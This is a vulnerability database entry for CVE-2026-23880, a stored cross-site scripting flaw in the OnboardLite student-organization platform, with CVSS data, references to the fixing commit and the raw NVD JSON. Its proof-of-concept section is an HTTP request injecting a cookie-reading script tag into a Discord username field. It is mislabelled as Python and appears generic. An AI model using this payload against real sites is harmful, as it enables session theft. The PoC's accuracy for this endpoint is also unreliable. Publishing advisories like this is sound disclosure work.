CVE-2026-23880

Description

OnboardLite is a comprehensive membership lifecycle platform built for student organizations at the University of Central Florida. Versions of the software prior to commit 1d32081a66f21bcf41df1ecb672490b13f6e429f have a stored cross-site scripting vulnerability that can be rendered to an admin when they attempt to migrate a user's discord account in the dashboard. Commit 1d32081a66f21bcf41df1ecb672490b13f6e429f patches the issue.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

OnboardLite < 1.0.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

POST /api/discord/migrate HTTP/1.1
Host: target.com
Content-Type: application/json

{
  "user_id": "attacker_id",
  "discord_username": "<script>alert(document.cookie)</script>"
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23880
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23880
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23880/
[4] VulDB https://vuldb.com/cve/CVE-2026-23880
[5] https://github.com/HackUCF/OnboardLite/commit/1d32081a66f21bcf41df1ecb672490b13f6e429f
[6] https://github.com/HackUCF/OnboardLite/security/advisories/GHSA-93w8-83cg-h89g

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23880", "sourceIdentifier": "[email protected]", "published": "2026-01-19T21:15:52.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OnboardLite is a comprehensive membership lifecycle platform built for student organizations at the University of Central Florida. Versions of the software prior to commit 1d32081a66f21bcf41df1ecb672490b13f6e429f have a stored cross-site scripting vulnerability that can be rendered to an admin when they attempt to migrate a user's discord account in the dashboard. Commit 1d32081a66f21bcf41df1ecb672490b13f6e429f patches the issue."}, {"lang": "es", "value": "OnboardLite es una plataforma integral para el ciclo de vida de la membresía construida para organizaciones estudiantiles en la Universidad de Florida Central. Las versiones del software anteriores al commit 1d32081a66f21bcf41df1ecb672490b13f6e429f tienen una vulnerabilidad de cross-site scripting almacenado que puede ser renderizada a un administrador cuando intenta migrar la cuenta de Discord de un usuario en el panel de control. El commit 1d32081a66f21bcf41df1ecb672490b13f6e429f corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-116"}]}], "references": [{"url": "https://github.com/HackUCF/OnboardLite/commit/1d32081a66f21bcf41df1ecb672490b13f6e429f", "source": "[email protected]"}, {"url": "https://github.com/HackUCF/OnboardLite/security/advisories/GHSA-93w8-83cg-h89g", "source": "[email protected]"}]}}